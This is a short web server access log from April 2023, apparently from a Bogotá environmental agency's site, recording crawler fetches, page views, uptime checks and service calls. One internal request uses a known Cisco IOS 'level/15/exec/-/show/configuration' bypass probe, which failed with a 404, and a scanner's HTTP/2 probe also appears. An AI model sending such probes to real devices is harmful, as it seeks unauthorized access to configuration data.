173.252.107.117 - - [15/Apr/2023:09:04:24 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
173.252.107.21 - - [15/Apr/2023:09:04:24 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
173.252.107.15 - - [15/Apr/2023:09:04:24 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
173.252.107.113 - - [15/Apr/2023:09:04:24 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
173.252.107.3 - - [15/Apr/2023:09:04:24 -0500] "GET /images/28%20de%20febrero%20operativo.jpeg HTTP/1.1" 200 62220
173.252.107.12 - - [15/Apr/2023:09:04:24 -0500] "GET /images/Juan%20Rey%20febrero%2013.jpg HTTP/1.1" 200 55934
173.252.107.116 - - [15/Apr/2023:09:04:24 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
173.252.107.120 - - [15/Apr/2023:09:04:24 -0500] "GET /images/17%20de%20febrero%20mujeres%20que%20reverdecen.jpeg HTTP/1.1" 200 85735
173.252.107.3 - - [15/Apr/2023:09:04:25 -0500] "GET /images/WhatsApp%20Image%202023-02-15%20at%205.07.25%20PM.jpeg HTTP/1.1" 200 50573
173.252.107.15 - - [15/Apr/2023:09:04:25 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
173.252.107.3 - - [15/Apr/2023:09:04:25 -0500] "GET /images/empresas-alertas_optimized.jpeg HTTP/1.1" 200 142365
173.252.107.116 - - [15/Apr/2023:09:04:25 -0500] "GET /images/camino-a-los-cerros-1_optimized.jpeg HTTP/1.1" 200 222279
173.252.107.3 - - [15/Apr/2023:09:04:25 -0500] "GET /images/Conversatorio%20aire%201%20(1).jpeg HTTP/1.1" 200 72040
31.13.127.26 - - [15/Apr/2023:09:04:39 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
31.13.127.13 - - [15/Apr/2023:09:04:40 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
173.252.127.20 - - [15/Apr/2023:09:04:43 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html?fbclid=IwAR2IwRAxa9DK9t2TJddoR4cPEwn-Wtqn2ICwOLVk2oK_Za7ENi5tkX2TRTw HTTP/1.1" 200 935
201.245.192.253 - - [15/Apr/2023:09:04:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
173.252.95.116 - - [15/Apr/2023:09:04:51 -0500] "GET /empresas-con-impacto-ambiental-positivo-unanse-a-la-edicion-2023-de-negocios-verdes-mas-cerca-de-ti.html?fbclid=IwAR3w6kLkR0txSM_evu5EryWUkyNV-zPHfNIpgST8KvK6JXM7BVLCPsQ-qSk HTTP/1.1" 200 878
173.252.127.19 - - [15/Apr/2023:09:04:52 -0500] "GET /la-secretaria-de-ambiente-ha-gestionado-14-5-toneladas-de-ropa-y-calzado-en-desuso.html?fbclid=IwAR06bn2LGYERU_C8ggaUQw2dmz7P1iVRvBqjqHWM11hMwBqDs1VgS8FuzSE HTTP/1.1" 200 869
31.13.115.1 - - [15/Apr/2023:09:04:52 -0500] "GET /cuatro-animales-y-cerca-de-cinco-kilos-de-carne-de-especimenes-silvestres-fueron-incautados-en-los-ultimos-dias-en-bogota.html?fbclid=IwAR1ZlbDdJM8O1qg33IbjBpZDYqsCWg0gnMLZ-g9Qa2YPYYQtiEq8NLmIxSw HTTP/1.1" 200 869
216.245.221.92 - - [15/Apr/2023:09:05:06 -0500] "HEAD / HTTP/1.1" 200 -
114.119.145.126 - - [15/Apr/2023:09:05:07 -0500] "-" 408 -
144.76.22.146 - - [15/Apr/2023:09:05:28 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
135.181.214.38 - - [15/Apr/2023:09:05:35 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
172.22.2.4 - - [15/Apr/2023:09:05:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:09:06:59 -0500] "GET /BLA/boletinlegal/level/15/exec/-/show/configuration/CR HTTP/1.1" 404 1018
179.19.61.208 - - [15/Apr/2023:09:07:27 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
172.22.2.4 - - [15/Apr/2023:09:05:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [15/Apr/2023:09:09:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:09:10:06 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.51 - - [15/Apr/2023:09:11:32 -0500] "-" 408 -
114.111.32.220 - - [15/Apr/2023:09:11:51 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
172.22.2.4 - - [15/Apr/2023:09:10:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:09:11:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
172.22.2.4 - - [15/Apr/2023:09:13:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
51.158.37.186 - - [15/Apr/2023:09:13:43 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [15/Apr/2023:09:14:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
186.155.130.231 - - [15/Apr/2023:09:14:45 -0500] "GET /empresas-con-impacto-ambiental-positivo-unanse-a-la-edicion-2023-de-negocios-verdes-mas-cerca-de-ti.html HTTP/1.1" 200 878
216.245.221.92 - - [15/Apr/2023:09:15:05 -0500] "HEAD / HTTP/1.1" 200 -
167.94.138.35 - - [15/Apr/2023:09:15:15 -0500] "GET / HTTP/1.1" 200 319
167.94.138.35 - - [15/Apr/2023:09:15:16 -0500] "PRI * HTTP/2.0" 400 946
167.94.138.35 - - [15/Apr/2023:09:15:16 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.102.98.195 - - [15/Apr/2023:09:16:14 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/0S1mgDwUj3AySTxN1WX+Hk53A8lzMqH27xVXXQRxKkR8gmTv0LUdx&y=U2FsdGVkX19b7CfU9u3kUcu5cacFtcusMYtuChsgpx8= HTTP/1.1" 200 30
186.102.98.195 - - [15/Apr/2023:09:16:14 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18t005CLkM29BsBxT+TxQXY6aZrc6tCXaBdByXJvQsWxRPql4bpdm1NTjdEASZ7G+AgWh5Vmjc+494upYjVFmuvh4t3xPzh09k=&u=U2FsdGVkX18yH/xJak1hkFBmp9X/JYstg1c/NAS4zrQ=&y=U2FsdGVkX19b7CfU9u3kUcu5cacFtcusMYtuChsgpx8= HTTP/1.1" 200 97
